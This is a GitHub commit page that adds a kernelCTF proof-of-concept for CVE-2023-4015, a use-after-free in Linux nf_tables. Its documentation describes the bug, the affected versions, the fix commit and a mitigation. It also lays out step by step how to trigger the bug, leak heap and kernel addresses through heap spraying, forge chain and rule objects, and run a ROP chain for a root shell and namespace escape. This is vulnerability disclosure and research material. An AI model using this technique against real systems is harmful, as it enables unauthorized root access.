Skip to content

Commit

Permalink
kernelctf: add CVE-2023-4015_cos
Browse files Browse the repository at this point in the history
  • Loading branch information
kungfulon committed Nov 30, 2024
1 parent 11d8044 commit a269939
Show file tree
Hide file tree
Showing 7 changed files with 856 additions and 0 deletions.
96 changes: 96 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,96 @@
# CVE-2023-4015

This documentation briefly describe the exploit. For more technical details, please look at the exploit source code.

In order to trigger the vulnerability, `CAP_NET_ADMIN` is required. We can use a namespace sandbox in order to achieve this condition.
Also for all allocations in the kernel heap we make do not span over multiple percpu slabs, we will pin our process to a single CPU.

## Triggering the vulnerability

We aim to free a `nft_chain` object resides in `kmalloc-128` cache.

- Batch 1
- Create a table `t`
- Create a chain `c1`
- Create a chain `c2` hosting a rule `r2` that has an immediate expression `e2` which binds to `c1`
+ `c1->use == 1`
- Batch 2
- Create a chain `c3` hosting a rule `r3` that has an immediate expression `e3` which binds to `c1`
+ `c3` should have `NFT_CHAIN_BINDING` flag
+ `c1->use = 2`
- Create a chain `c4` hosting a rule `r4` that has an immediate expression `e4` which binds to `c3`
+ However, we will not allow the rule creation to success by adding another immediate expression, which binds to a non-existant chain
+ At this point, `nft_rule_expr_deactivate` will be called on `r4` with `phase = NFT_TRANS_PREPARE_ERROR`
+ `nft_immediate_deactivate` will be called on `e4`
+ Since `c3` has `NFT_CHAIN_BINDING` flag, `nft_rule_expr_deactivate` will be called on `r3`, which will also deactivate `e3`
+ `c1->use = 1` because `c1` is bound to `e3`
- Because the batch failed, transaction rollback will be executed with `phase = NFT_TRANS_ABORT`
+ `c3`, `r3`, `e3` will be deactivated again
+ `c1->use = 0`
- Batch 3
- Because `c1->use = 0`, we can delete chain `c1`

After this, we have a dangling reference in `e2` to the freed chain `c1`.
The naming convention here is for demonstration purpose only. In the exploit it will be different.
We will also create a `spray` chain in order to spray the heap using `nft_rule` object later (mostly to avoid accidentally reclaiming the freed chunk when creating new chain).

## Leak kernel heap address

When dumping immediate expression binding to another chain, we will get the chain's name.
When the chain is freed, the buffer containing its name is also freed. The address pointing to the name is not cleared.
If we reclaim the freed name buffer, but not the freed chain, we can leak data from the start of the reclaimed object until a NULL byte.
With chunk size 192 (`kmalloc-192`), it is less likely that we will get NULL byte in the address.
So when creating `c1` rule, we set the actual name to be 129-192 bytes long (including NULL terminating character).

We will use `nft_rule` as the spraying object to reclaim the freed name chunk because:

- It is an elastic object so we can attack many caches
- The elastic portion are flattened expression array (up to 128 expressions) and arbitrary user data (up to 255 bytes)
- The first field is `list_head` so we can leak heap address of the next rule and the previous rule

We create a lot of rules with some user data so that the total length of the `nft_rule` struct is in range 129-192 bytes.
After spraying, we request to dump `r2` which will dump `e2` and hopefully we will get the heap address of a `nft_rule` object.
If the leak fails, we will try again.
We will also be able to leak the `handle` of the rule object that reclaimed the freed name chunk.
It will be used to correctly free only the rule that we got the heap address for later stage.

We will also add a `nft_notrack` expression to the rule so there will be a kernel pointer inside, which we will leak in the next stage once we get the heap leak. The in-memory structure layout of the sprayed rules looks like this (first 0x18 bytes are rule metadata):

| Offset | Field | Value |
---------|-------|-------|
...
0x18|expression|`nft_notrack_ops`
0x20|`nft_userdata.len`|x
0x21|`nft_userdata.data`|any
...
0xbf|`nft_userdata.data`|any

## Leak kernel base address

Now that we have heap leak and we know that a kernel address is inside that chunk, let's leak it by creating a fake chain with name pointing to the leaked heap region by reclaiming the freed chain (reminder: the freed `nft_chain` is in `kmalloc-128` cache).
This time we will spray using `userdata` of `nft_table`. We can store at most 256 bytes of arbitrary data.
We create multiple `nft_table` with different names that has 128 bytes `userdata` with structure layout looks like following:

| Offset | `nft_chain` field | Value | Remarks |
---------|-------------------|-----------------|
0x0|`list`|any|
0x10|`rules.next`|heap leak|for next stage
0x18|`rules.prev`|heap leak|for next stage
...
0x54|`flags`|`NFT_CHAIN_BINDING`|for next stage
0x58|`name`|heap leak + `sizeof(struct nft_rule)`|where we put `nft_notrack_ops` in the sprayed rule above
...

After spraying, we request to dump `r2` which will dump `e2` and hopefully we will get the address of `nft_notrack_ops`.

## RIP control and return to userspace

As we have `handle` of the rule that got its address leaked, we delete it.
Then, we spray a fake `nft_rule` that also act as a ROP chain. Remember that the deleted rule resided in `kmalloc-192` cache.
We set `dlen` of the fake rule to 1 to pass the expression loop check.
We craft a fake expression that has its `ops` point to the leaked heap. We need to align `ops->deactivate` with a JOP gadget.
Following that, we build a ROP chain that do `commit_creds(&init_cred)`, `switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy)` then return to userspace.

After spraying, we delete the rule `r2` which will call `nft_rule_expr_deactivate` on `e2`. Since we prepared fake rule list for the reclaimed fake chain, and set its flag to `NFT_CHAIN_BINDING`, the fake rule will be deactivated and the fake expression's `deactivate` routine will be called, which will trigger the JOP gadget then the ROP chain.

Returning to userspace, we use `setns` to escape from the jail then spawn a root shell using `execve`.
48 changes: 48 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
# CVE-2023-4015

In `nft_immediate_deactivate`, if the immediate expression has `dreg == NFT_REG_VERDICT` and has binding to a chain with flag `NFT_CHAIN_BINDING`, it will call `nft_rule_expr_deactivate` on all rules under the bound chain.
This will in turn call `deactivate` method on all expressions belong to the rule. If there's an immediate expression that has binding to a chain, it will go through the same deactivation routine.
Then at the end, the bound chain will has its `use` counter decrease by `1` when `nft_data_release` is called each time this function is called and the transaction phase is not `NFT_TRANS_COMMIT`.

Problem arises if this function is called twice on an expression in a single transaction in any phases other than `NFT_TRANS_COMMIT`, the bound chain's `use` will be decreased by `2`.
Considering the case when the chain has 2 objects holding reference to it, the `use` of the chain will be `0`, which allows the chain to be deleted and leaving a dangling reference.

Before commit [26b5a5712eb85e253724e56a54c17f8519bd8e4e](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e), there are no vulnerable code paths.
However the commit introduced `NFT_TRANS_PREPARE_ERROR` phase, which opened up a way to achieve the UAF condition because when error happens when creating a rule, it will call deactivate on successfully created expressions, which could be immediate expressions binding to a chain created in the same batch.
The chain in the batch will also be deactivated again when rolling back the transaction.
Detailed demonstration of the UAF can be seen in exploit.md.

## Requirements to trigger the vulnerability

|Capabilities|Kernel configuration|Are user namespaces needed?|
|---|---|---|
|CAP_NET_ADMIN|CONFIG_NF_TABLES|Yes|

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2

## Affected kernel versions

- 5.10.188 - 5.10.189
- 5.15.119 - 5.15.123
- 6.1.36 - 6.1.42
- 6.3.10 - 6.3.13
- 6.4 - 6.4.7
- 6.5-rc1 - 6.5-rc3

## Affected component, subsystem

netfilter/nf_tables

## Cause

Use-after-free

## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability?

Disable the ability to communicate with nf_tables subsystem under unprivileged user namespace, or prevent creation of unprivileged user namespace.
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
deps
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
CFLAGS=-D_GNU_SOURCE -std=gnu17 -Wall -O0 -static -I./deps/include
LIBS=deps/lib/libnftnl.a deps/lib/libmnl.a

.PHONY: exploit
exploit:
$(CC) $(CFLAGS) exploit.c -o exploit $(LIBS)

prerequisites:
mkdir -p deps
wget -O libmnl-1.0.5.tar.bz2 https://www.netfilter.org/pub/libmnl/libmnl-1.0.5.tar.bz2
tar -xf libmnl-1.0.5.tar.bz2
cd libmnl-1.0.5 && ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
wget -O libnftnl-1.2.8.tar.xz https://www.netfilter.org/pub/libnftnl/libnftnl-1.2.8.tar.xz
tar -xf libnftnl-1.2.8.tar.xz
cd libnftnl-1.2.8 && LIBMNL_CFLAGS=-I$(PWD)/deps/include LIBMNL_LIBS=$(PWD)/deps/lib/libmnl.a ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
rm -rf libmnl* libnftnl*
Loading

0 comments on commit a269939

Please sign in to comment.